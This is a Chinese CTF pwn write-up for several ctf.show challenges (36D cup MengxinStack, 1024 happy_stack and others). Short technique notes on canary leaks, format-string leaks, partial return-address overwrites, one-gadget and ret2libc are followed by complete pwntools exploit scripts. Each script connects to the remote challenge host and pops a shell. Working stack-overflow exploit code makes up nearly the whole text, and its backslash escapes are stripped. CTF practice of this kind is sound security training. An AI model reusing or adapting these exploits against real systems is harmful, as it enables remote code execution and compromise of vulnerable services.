PWN-PRACTICE-CTFSHOW-6

36D杯-MengxinStack36D杯-tang1024杯-1024_happy_stack1024杯-1024_happy_checkin

程序开了canary和PIE保护
泄露远程libc版本，为 libc6_2.23-0ubuntu10_amd64.so

from pwn import *
io=remote("pwn.challenge.ctf.show",28124)
io.recvuntil("She said: hello?n")
payload="a"*0x40+"b"*8
io.send(payload)
io.recvuntil("b"*8)
__libc_start_main_ret=u64(io.recvuntil("x7f")[-6:].ljust(8,"x00"))
print("__libc_start_main_ret=="+hex(__libc_start_main_ret))

泄露canary->覆盖返回地址低字节，重新调用main->泄露libc基地址->覆盖返回地址为one-gadget

# -*- coding:utf-8 -*-
from pwn import *
context.log_level="debug"
#io=process("./pwn1")
io=remote("pwn.challenge.ctf.show",28124)
elf=ELF("./pwn1")

#泄露远程libc版本
#io.recvuntil("She said: hello?n")
#payload="a"*0x40+"b"*8
#io.send(payload)
#io.recvuntil("b"*8)
#__libc_start_main_ret=u64(io.recvuntil("x7f")[-6:].ljust(8,"x00"))
#print("__libc_start_main_ret=="+hex(__libc_start_main_ret))

#远程libc
libc=ELF("./libc6_2.23-0ubuntu10_amd64.so")

#泄露canary
io.recvuntil("She said: hello?n")
payload="a"*32+"b"*8
io.sendline(payload)
io.recvuntil("b"*8)
canary=u64(io.recv(8))-0xa
print("canary=="+hex(canary))

#.text:00000000000207FA                 mov     rax, fs:2F8h
#.text:0000000000020803                 mov     [rsp+0B8h+var_48], rax
#.text:0000000000020808                 lea     rax, [rsp+0B8h+var_98]
#.text:000000000002080D                 mov     fs:300h, rax
#.text:0000000000020816                 mov     rax, cs:environ_ptr_0
#.text:000000000002081D                 mov     rsi, [rsp+0B8h+var_B0]
#.text:0000000000020822                 mov     edi, [rsp+0B8h+var_A4]
#.text:0000000000020826                 mov     rdx, [rax]
#.text:0000000000020829                 mov     rax, [rsp+0B8h+var_A0]
#.text:000000000002082E                 call    rax
#.text:0000000000020830
#.text:0000000000020830 loc_20830:                              ; CODE XREF: __libc_start_main+134↓j
#.text:0000000000020830                 mov     edi, eax
#.text:0000000000020832                 call    exit

#覆盖返回地址低字节，重新调用main
payload="a"*40+p64(canary)+"b"*0x18+"x16"
io.send(payload)

#泄露libc基址
io.recvuntil("She said: hello?n")
payload="a"*0x40+"b"*8
io.send(payload)
io.recvuntil("b"*8)
__libc_start_main=u64(io.recvuntil("x7f")[-6:].ljust(8,"x00"))-(0x20830-0x20740)
libc_base=__libc_start_main-libc.sym["__libc_start_main"]
ogg=libc_base+0x45216

#覆盖返回地址到one-gadget
payload="a"*40+p64(canary)+"b"*0x18+p64(ogg)
io.send(payload)

io.interactive()

保护全开，这题思路和36D杯-MengxinStack很像
泄露远程libc版本，为 libc6_2.23-0ubuntu10_amd64.so

from pwn import *
io.recvuntil("你怎么了？n")
io.send("%23$p")
io.recvuntil("0x")
__libc_start_main_ret=int(io.recv(12),16)
print("__libc_start_main_ret=="+hex(__libc_start_main_ret))

泄露canary->覆盖返回地址低字节，重新调用main->泄露libc基地址->覆盖返回地址为one-gadget

# -*- coding:utf-8 -*-
from pwn import *
context.log_level="debug"
#io=process("./pwn1")
io=remote("pwn.challenge.ctf.show",28026)
elf=ELF("./pwn1")

#泄露远程libc版本
#io.recvuntil("你怎么了？n")
#io.send("%23$p")
#io.recvuntil("0x")
#__libc_start_main_ret=int(io.recv(12),16)
#print("__libc_start_main_ret=="+hex(__libc_start_main_ret))

#远程libc
libc=ELF("./libc6_2.23-0ubuntu10_amd64.so")

#泄露canary
io.recvuntil("你怎么了？n")
io.send("%9$p")
io.recvuntil("0x")
canary=int(io.recv(16),16)
print("canary=="+hex(canary))

#.text:00000000000207FA                 mov     rax, fs:2F8h
#.text:0000000000020803                 mov     [rsp+0B8h+var_48], rax
#.text:0000000000020808                 lea     rax, [rsp+0B8h+var_98]
#.text:000000000002080D                 mov     fs:300h, rax
#.text:0000000000020816                 mov     rax, cs:environ_ptr_0
#.text:000000000002081D                 mov     rsi, [rsp+0B8h+var_B0]
#.text:0000000000020822                 mov     edi, [rsp+0B8h+var_A4]
#.text:0000000000020826                 mov     rdx, [rax]
#.text:0000000000020829                 mov     rax, [rsp+0B8h+var_A0]
#.text:000000000002082E                 call    rax
#.text:0000000000020830
#.text:0000000000020830 loc_20830:                              ; CODE XREF: __libc_start_main+134↓j
#.text:0000000000020830                 mov     edi, eax
#.text:0000000000020832                 call    exit

io.recvuntil("烫n")
io.sendline("P1umH0")

#覆盖返回地址低字节，重新调用main
io.recvuntil("远一点！n")
payload="a"*56+p64(canary)+"b"*0x18+"x16"
io.send(payload)

#泄露libc基址
io.recvuntil("你怎么了？n")
io.send("%23$p")
io.recvuntil("0x")
__libc_start_main=int(io.recv(12),16)-(0x20830-0x20740)
libc_base=__libc_start_main-libc.sym["__libc_start_main"]
ogg=libc_base+0xf1147

io.recvuntil("烫n")
io.sendline("P1umH0")

#覆盖返回地址到one-gadget
io.recvuntil("远一点！n")
payload="a"*56+p64(canary)+"b"*0x18+p64(ogg)
io.send(payload)

io.interactive()

栈溢出，用"36Dx00"绕过strcmp，然后ret2libc

# -*- coding:utf-8 -*-
from pwn import *
context.log_level="debug"
#io=process("./pwn1")
io=remote("pwn.challenge.ctf.show",28138)
elf=ELF("./pwn1")

puts_got=elf.got["puts"]
puts_plt=elf.plt["puts"]
main_addr=0x4006AE
pop_rdi=0x400803
ret=0x40028a

io.recvuntil("qunzhunn")
payload="36Dx00"+"a"*(0x380-4)+"b"*8+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(main_addr)
io.sendline(payload)
puts_addr=u64(io.recvuntil("x7f")[-6:].ljust(8,"x00"))
print("puts_addr=="+hex(puts_addr))
libc_base=puts_addr-0x0809c0
system=libc_base+0x04f440
binsh=libc_base+0x1b3e9a

io.recvuntil("qunzhunn")
payload="36Dx00"+"a"*(0x380-4)+"b"*8+p64(pop_rdi)+p64(binsh)+p64(ret)+p64(system)
io.sendline(payload)

io.interactive()

栈溢出，ret2libc

# -*- coding:utf-8 -*-
from pwn import *
context.log_level="debug"
#io=process("./pwn1")
io=remote("pwn.challenge.ctf.show",28173)
elf=ELF("./pwn1")

puts_got=elf.got["puts"]
puts_plt=elf.plt["puts"]
main_addr=0x4005F7
pop_rdi=0x4006e3
ret=0x4004c6

io.recvuntil("ticketn")
payload="a"*0x370+"b"*8+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(main_addr)
io.sendline(payload)
puts_addr=u64(io.recvuntil("x7f")[-6:].ljust(8,"x00"))
print("puts_addr=="+hex(puts_addr))
libc_base=puts_addr-0x0809c0
system=libc_base+0x04f440
binsh=libc_base+0x1b3e9a

io.recvuntil("ticketn")
payload="a"*0x370+"b"*8+p64(pop_rdi)+p64(binsh)+p64(ret)+p64(system)
io.sendline(payload)

io.interactive()